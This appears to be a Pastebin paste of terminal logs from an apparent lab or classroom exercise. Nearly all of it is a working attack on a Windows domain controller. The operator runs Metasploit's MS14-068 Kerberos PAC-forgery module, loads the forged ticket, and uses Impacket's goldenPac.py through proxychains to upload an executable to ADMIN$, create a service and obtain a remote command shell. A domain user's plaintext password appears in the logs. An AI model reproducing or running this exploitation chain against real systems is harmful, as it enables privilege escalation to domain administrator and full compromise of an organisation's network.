API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Nov 9th, 2018
219
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 13.19 KB | None | 0 0
raw download clone embed print report
  1.  
  2.  
  3. msf auxiliary(socks4a) > use auxiliary/admin/kerberos/ms14_068_kerberos_checksum
  4. msf auxiliary(ms14_068_kerberos_checksum) > show info
  5.  
  6. Name: MS14-068 Microsoft Kerberos Checksum Validation Vulnerability
  7. Module: auxiliary/admin/kerberos/ms14_068_kerberos_checksum
  8. License: Metasploit Framework License (BSD)
  9. Rank: Normal
  10. Disclosed: 2014-11-18
  11.  
  12. Provided by:
  13. Tom Maddock
  14. Sylvain Monne
  15. juan vazquez <juan.vazquez@metasploit.com>
  16.  
  17. Basic options:
  18. Name Current Setting Required Description
  19. ---- --------------- -------- -----------
  20. DOMAIN yes The Domain (upper case) Ex: DEMO.LOCAL
  21. PASSWORD yes The Domain User password
  22. RHOST yes The target address
  23. RPORT 88 yes The target port
  24. Timeout 10 yes The TCP timeout to establish connection and read data
  25. USER yes The Domain User
  26. USER_SID yes The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000
  27.  
  28. Description:
  29. This module exploits a vulnerability in the Microsoft Kerberos
  30. implementation. The problem exists in the verification of the
  31. Privilege Attribute Certificate (PAC) from a Kerberos TGS request,
  32. where a domain user may forge a PAC with arbitrary privileges,
  33. including Domain Administrator. This module requests a TGT ticket
  34. with a forged PAC and exports it to a MIT Kerberos Credential Cache
  35. file. It can be loaded on Windows systems with the Mimikatz help. It
  36. has been tested successfully on Windows 2008.
  37.  
  38. References:
  39. https://cvedetails.com/cve/CVE-2014-6324/
  40. https://technet.microsoft.com/en-us/library/security/MS14-068
  41. OSVDB (114751)
  42. http://blogs.technet.com/b/srd/archive/2014/11/18/additional-information-about-cve-2014-6324.aspx
  43. https://labs.mwrinfosecurity.com/blog/2014/12/16/digging-into-ms14-068-exploitation-and-defence/
  44. https://github.com/bidord/pykek
  45. https://community.rapid7.com/community/metasploit/blog/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit
  46.  
  47. msf auxiliary(ms14_068_kerberos_checksum) > set DOMAIN contoso-west.org
  48. DOMAIN => contoso-west.org
  49. msf auxiliary(ms14_068_kerberos_checksum) > set RHOST 10.0.0.149
  50. RHOST => 10.0.0.149
  51. msf auxiliary(ms14_068_kerberos_checksum) > set USER blot
  52. USER => blot
  53. msf auxiliary(ms14_068_kerberos_checksum) > set user_sid S-1-5-21-3039018489-1111549232-2925702125-1109
  54. user_sid => S-1-5-21-3039018489-1111549232-2925702125-1109
  55. msf auxiliary(ms14_068_kerberos_checksum) > show options
  56.  
  57. Module options (auxiliary/admin/kerberos/ms14_068_kerberos_checksum):
  58.  
  59. Name Current Setting Required Description
  60. ---- --------------- -------- -----------
  61. DOMAIN CONTOSO-WEST yes The Domain (upper case) Ex: DEMO.LOCAL
  62. PASSWORD yes The Domain User password
  63. RHOST 10.0.0.149 yes The target address
  64. RPORT 88 yes The target port
  65. Timeout 10 yes The TCP timeout to establish connection and read data
  66. USER blot yes The Domain User
  67. USER_SID S-1-5-21-3039018489-1111549232-2925702125-1109 yes The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000
  68.  
  69. msf auxiliary(ms14_068_kerberos_checksum) > set PASSWORD Bl0tt12309-
  70. PASSWORD => Bl0tt12309-
  71. msf auxiliary(ms14_068_kerberos_checksum) > show options
  72.  
  73. Module options (auxiliary/admin/kerberos/ms14_068_kerberos_checksum):
  74.  
  75. Name Current Setting Required Description
  76. ---- --------------- -------- -----------
  77. DOMAIN CONTOSO-WEST yes The Domain (upper case) Ex: DEMO.LOCAL
  78. PASSWORD Bl0tt12309- yes The Domain User password
  79. RHOST 10.0.0.149 yes The target address
  80. RPORT 88 yes The target port
  81. Timeout 10 yes The TCP timeout to establish connection and read data
  82. USER blot yes The Domain User
  83. USER_SID S-1-5-21-3039018489-1111549232-2925702125-1109 yes The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000
  84.  
  85. msf auxiliary(ms14_068_kerberos_checksum) > run
  86.  
  87. [*] Validating options...
  88. [*] Using domain CONTOSO-WEST...
  89. [*] 10.0.0.149:88 - Sending AS-REQ...
  90. [*] 10.0.0.149:88 - Parsing AS-REP...
  91. [*] 10.0.0.149:88 - Sending TGS-REQ...
  92. [!] 10.0.0.149:88 - KRB_AP_ERR_BADMATCH - Ticket and authenticator don't match
  93. [-] 10.0.0.149:88 - Invalid TGS-REP, aborting...
  94. [*] Auxiliary module execution completed
  95. msf auxiliary(ms14_068_kerberos_checksum) > set domain contoso-west.org
  96. domain => contoso-west.org
  97. msf auxiliary(ms14_068_kerberos_checksum) > run
  98.  
  99. [*] Validating options...
  100. [*] Using domain CONTOSO-WEST.ORG...
  101. [*] 10.0.0.149:88 - Sending AS-REQ...
  102. [*] 10.0.0.149:88 - Parsing AS-REP...
  103. [*] 10.0.0.149:88 - Sending TGS-REQ...
  104. [+] 10.0.0.149:88 - Valid TGS-Response, extracting credentials...
  105. [+] 10.0.0.149:88 - MIT Credential Cache saved on /root/.msf4/loot/20181109211513_default_10.0.0.149_windows.kerberos_173395.bin
  106. [*] Auxiliary module execution completed
  107.  
  108.  
  109.  
  110.  
  111. proxychains net rpc -W contoso-west.org -U blot -S 10.0.0.149 shell
  112. ProxyChains-3.1 (http://proxychains.sf.net)
  113. Enter blot's password:
  114. |S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:445-<><>-OK
  115. Talking to domain CONTOSO-WEST (S-1-5-21-3039018489-1111549232-2925702125)
  116. net rpc> user
  117. net rpc user> show
  118. Usage: net rpc user show <username>
  119. net rpc user show failed: NT_STATUS_INVALID_PARAMETER
  120. net rpc user> show blot
  121. user rid: 1109, group rid: 513
  122. net rpc user> packet_write_wait: Connection to 2001:700:300:7::85 port 22: Broken pipe
  123.  
  124.  
  125. auxiliary/admin/kerberos/ms14_068_kerberos_checksum
  126.  
  127.  
  128. msf auxiliary(ms14_068_kerberos_checksum) > show info
  129.  
  130. Name: MS14-068 Microsoft Kerberos Checksum Validation Vulnerability
  131. Module: auxiliary/admin/kerberos/ms14_068_kerberos_checksum
  132. License: Metasploit Framework License (BSD)
  133. Rank: Normal
  134. Disclosed: 2014-11-18
  135.  
  136. Provided by:
  137. Tom Maddock
  138. Sylvain Monne
  139. juan vazquez <juan.vazquez@metasploit.com>
  140.  
  141. Basic options:
  142. Name Current Setting Required Description
  143. ---- --------------- -------- -----------
  144. DOMAIN yes The Domain (upper case) Ex: DEMO.LOCAL
  145. PASSWORD yes The Domain User password
  146. RHOST yes The target address
  147. RPORT 88 yes The target port
  148. Timeout 10 yes The TCP timeout to establish connection and read data
  149. USER yes The Domain User
  150. USER_SID yes The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000
  151.  
  152. Description:
  153. This module exploits a vulnerability in the Microsoft Kerberos
  154. implementation. The problem exists in the verification of the
  155. Privilege Attribute Certificate (PAC) from a Kerberos TGS request,
  156. where a domain user may forge a PAC with arbitrary privileges,
  157. including Domain Administrator. This module requests a TGT ticket
  158. with a forged PAC and exports it to a MIT Kerberos Credential Cache
  159. file. It can be loaded on Windows systems with the Mimikatz help. It
  160. has been tested successfully on Windows 2008.
  161.  
  162. References:
  163. https://cvedetails.com/cve/CVE-2014-6324/
  164. https://technet.microsoft.com/en-us/library/security/MS14-068
  165. OSVDB (114751)
  166. http://blogs.technet.com/b/srd/archive/2014/11/18/additional-information-about-cve-2014-6324.aspx
  167. https://labs.mwrinfosecurity.com/blog/2014/12/16/digging-into-ms14-068-exploitation-and-defence/
  168. https://github.com/bidord/pykek
  169. https://community.rapid7.com/community/metasploit/blog/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit
  170.  
  171.  
  172.  
  173. msf auxiliary(ms14_068_kerberos_checksum) > set DOMAIN contoso-west.org
  174. DOMAIN => CONTOSO-WEST
  175. msf auxiliary(ms14_068_kerberos_checksum) > set RHOST 10.0.0.149
  176. RHOST => 10.0.0.149
  177. msf auxiliary(ms14_068_kerberos_checksum) > set USER blot
  178. USER => blot
  179. msf auxiliary(ms14_068_kerberos_checksum) > set user_sid S-1-5-21-3039018489-1111549232-2925702125-1109
  180. user_sid => S-1-5-21-3039018489-1111549232-2925702125-1109
  181. msf auxiliary(ms14_068_kerberos_checksum) > set PASSWORD Bl0tt12309-
  182. msf auxiliary(ms14_068_kerberos_checksum) > show options
  183.  
  184. Module options (auxiliary/admin/kerberos/ms14_068_kerberos_checksum):
  185.  
  186. Name Current Setting Required Description
  187. ---- --------------- -------- -----------
  188. DOMAIN contoso-west.org yes The Domain (upper case) Ex: DEMO.LOCAL
  189. PASSWORD Bl0tt12309- yes The Domain User password
  190. RHOST 10.0.0.149 yes The target address
  191. RPORT 88 yes The target port
  192. Timeout 10 yes The TCP timeout to establish connection and read data
  193. USER blot yes The Domain User
  194. USER_SID S-1-5-21-3039018489-1111549232-2925702125-1109 yes The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000
  195.  
  196.  
  197. msf auxiliary(ms14_068_kerberos_checksum) > run
  198.  
  199. [*] Validating options...
  200. [*] Using domain CONTOSO-WEST.ORG...
  201. [*] 10.0.0.149:88 - Sending AS-REQ...
  202. [*] 10.0.0.149:88 - Parsing AS-REP...
  203. [*] 10.0.0.149:88 - Sending TGS-REQ...
  204. [+] 10.0.0.149:88 - Valid TGS-Response, extracting credentials...
  205. [+] 10.0.0.149:88 - MIT Credential Cache saved on /root/.msf4/loot/20181109211513_default_10.0.0.149_windows.kerberos_173395.bin
  206. [*] Auxiliary module execution completed
  207.  
  208. root@10-kali2-group10:~/.msf4/loot# ls
  209. 20181010173151_default_192.168.40.14_192.168.40.14_ce_775643.crt
  210. 20181010173151_default_192.168.40.14_192.168.40.14_ke_958653.key
  211. 20181010173151_default_192.168.40.14_192.168.40.14_pe_462147.pem
  212. 20181109211513_default_10.0.0.149_windows.kerberos_173395.bin
  213. root@10-kali2-group10:~/.msf4/loot#
  214.  
  215.  
  216. To use this ticket, which is in the Credential Cache (ccache) format, we need to move it to the /tmp directory where the Kerberos tools look for tickets
  217.  
  218. root@10-kali2-group10:~/.msf4/loot# mv 20181109211513_default_10.0.0.149_windows.kerberos_173395.bin /tmp/krb5cc
  219.  
  220.  
  221.  
  222.  
  223. Modified the nano /etc/krb5.conf
  224. added: [realms]
  225. CONTOSO-WEST.ORG = {
  226. kdc = dc2008r2-group1
  227. admin_server = dc2008r2-group1
  228. default_domain = CONTOSO-WEST
  229. }
  230. [domain_realm]
  231. .contoso-west = CONTOSO-WEST.org
  232. contoso-west = CONTOSO-WEST.org
  233.  
  234.  
  235. proxychains python2.7 examples/goldenPac.py -dc-ip 10.0.0.149 -target-ip 10.0.0.149 CONTOSO-WEST.org/Blot@dc2008r2-group1.CONTOSO-WEST.org
  236. ProxyChains-3.1 (http://proxychains.sf.net)
  237. Impacket v0.9.18-dev - Copyright 2018 SecureAuth Corporation
  238.  
  239. Password:Bl0tt12309-
  240. |S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:445-<><>-OK
  241. [*] User SID: S-1-5-21-3039018489-1111549232-2925702125-1109
  242. |S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:445-<><>-OK
  243. |DNS-request| contoso-west.org
  244. |S-chain|-<>-127.0.0.1:1099-<><>-4.2.2.2:53-<><>-OK
  245. |DNS-response|: contoso-west.org does not exist
  246. [-] Couldn't get forest info ([Errno Connection error (contoso-west.org:445)] [Errno 1] Unknown error), continuing
  247. [*] Attacking domain controller 10.0.0.149
  248. |S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:88-<><>-OK
  249. |S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:88-<><>-OK
  250. |S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:88-<><>-OK
  251. |S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:88-<><>-OK
  252. [*] 10.0.0.149 found vulnerable!
  253. |S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:445-<><>-OK
  254. [*] Requesting shares on 10.0.0.149.....
  255. [*] Found writable share ADMIN$
  256. [*] Uploading file UApVHfro.exe
  257. [*] Opening SVCManager on 10.0.0.149.....
  258. [*] Creating service TGOJ on 10.0.0.149.....
  259. [*] Starting service TGOJ.....
  260. |S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:445-<><>-OK
  261. |S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:445-<><>-OK
  262. [!] Press help for extra shell commands
  263. |S-chain|-<>-127.0.0.1:1099-<><>-10.0.0.149:445-<><>-OK
  264. Microsoft Windows [Version 6.1.7601]
  265. Copyright (c) 2009 Microsoft Corporation. All rights reserved.
  266.  
  267. C:\Windows\system32>ipconfig
  268.  
  269. Windows IP Configuration
  270.  
  271.  
  272. Ethernet adapter Local Area Connection:
  273.  
  274. Connection-specific DNS Suffix . :
  275. IPv4 Address. . . . . . . . . . . : 10.0.0.149
  276. Subnet Mask . . . . . . . . . . . : 255.255.255.240
  277. Default Gateway . . . . . . . . . : 10.0.0.145
  278.  
  279. Tunnel adapter isatap.{E58D4114-3C3A-46FD-AEAD-ECA142ED8636}:
  280.  
  281. Media State . . . . . . . . . . . : Media disconnected
  282. Connection-specific DNS Suffix . :
  283.  
  284. C:\Windows\system32>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!